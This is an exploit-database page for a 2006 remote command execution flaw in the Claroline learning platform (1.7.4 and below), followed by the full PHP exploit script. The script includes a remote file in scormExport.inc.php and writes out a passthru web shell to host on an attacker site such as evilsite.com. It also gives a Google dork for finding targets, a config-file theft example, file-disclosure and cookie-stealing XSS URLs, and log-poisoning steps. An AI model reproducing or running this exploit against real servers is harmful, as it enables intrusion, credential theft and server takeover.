Claroline - exploit.company

vendor:

Claroline

by:

rgod

7.5

CVSS

HIGH

Remote Command Execution

Unknown

CWE

Product Name: Claroline

Affected Version From: 1.7.4 and below

Affected Version To: 1.7.4 and below

Patch Exists: NO

Related CWE: Unknown

CPE: a:claroline_project:claroline:1.7.4

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Claroline <= 1.7.4 "scormExport.inc.php" remote command execution

This vulnerability allows an attacker to execute arbitrary commands on the target system. The vulnerability exists in the "scormExport.inc.php" file of Claroline version 1.7.4 and below. By exploiting this vulnerability, an attacker can execute commands with the privileges of the web server. This vulnerability requires the target server to have "register_globals" and "allow_url_fopen" settings enabled. The attacker needs to provide the target server IP/hostname, the path to Claroline, and an arbitrary location with the code to include. Optional parameters such as port and proxy can also be specified. The exploit works by including a remote location that contains malicious code. The remote location should contain either "lib/fileUpload.lib.php/index.html" or "lib/pclzip/pclzip.lib.php/index.html", which should have the following code: if (get_magic_quotes_gpc()){$_GET[cmd]=strisplashes($_GET[cmd]);} error_reporting(0); ini_set("max_execution_time",0); echo "*delim*"; passthru($_GET[cmd]); echo "*delim*"; die;

Mitigation:

Upgrade to a version of Claroline that is not affected by this vulnerability. Disable the "register_globals" and "allow_url_fopen" settings on the web server if they are not required. Regularly update and patch the software to address security vulnerabilities.

Source

Exploit-DB raw data:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Claroline <= 1.7.4 \"scormExport.inc.php\" remote cmmnds xctn\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> works with register_globals = On & allow_url_fopen = On\r\n\r\n";
echo "dork: \"Powered by Claroline\" -demo\r\n\r\n";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to claroline\r\n";
echo "location:  arbitrary location with the code to include\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n";
echo "/../inc/conf/claro_main.conf.php -p81\r\n";
echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n";
echo "note, on remote location you need a\r\n";
echo "/lib/fileUpload.lib.php/index.html\r\n";
echo "or a\r\n";
echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
echo "with this code inside:\r\n\r\n";
echo "<?php\r\n";
echo 'if (get_magic_quotes_gpc()){$_GET[cmd]=strisplashes($_GET[cmd]);}'."\r\n";
echo "error_reporting(0);\r\n";
echo 'ini_set("max_execution_time",0);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo 'passthru($_GET[cmd]);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo "die;\r\n";
echo '?>'."\r\n";
die;
}

/*
  explaination:
  software site: http://www.claroline.net/
  description:   Claroline is a free application based on PHP/MySQL allowing
                 teachers or education organizations to create and administrate
	         courses through the web.

  vulnerabilities:

  i) system disclosure:
  without to have an account you can see (not modify or include) all files on target system
  regardless of any php.ini settings, ex:

  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log
  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php
  (see inside html for this)

  ii)  xss & full path disclosure:
  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file="><script>alert(document.cookie)</script>

  iii) and finally, arbitrary remote inclusion / remote commands execution:

  iii.a)if register_globals = On & allow_url_fopen = On:
  http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com
  where on:
  http://evil.site.com/lib/fileUpload.lib.php/index.html
  or:
  http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html
  you have some php code

  iii.b)if register_globals = On & magic_quotes_gpc = Off:
  http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00
  (after you have injected some code in Apache log files and braking the path
  through a null char)

  this is the exploit for iii.a)
									      */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd='';
if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++)
{
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}

$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php";
$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"*delim*"))
{
  echo "Exploit succeeded...\r\n\r\n";
  $temp=explode("*delim*",$html);
  echo $temp[1];
}
else
{echo "Exploit failed...";}
?>

# milw0rm.com [2006-03-30]